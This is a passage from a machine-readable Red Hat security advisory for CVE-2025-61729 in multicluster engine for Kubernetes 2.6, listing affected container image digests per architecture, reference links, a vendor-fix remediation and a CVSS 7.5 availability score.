2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-61729"}, {"category": "external", "summary": "RHBZ#2418462", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729", "url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"}, {"category": "external", "summary": "https://go.dev/cl/725920", "url": "https://go.dev/cl/725920"}, {"category": "external", "summary": "https://go.dev/issue/76445", "url": "https://go.dev/issue/76445"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4", "url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2025-4155", "url": "https://pkg.go.dev/vuln/GO-2025-4155"}], "release_date": "2025-12-02T18:54:10.166000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 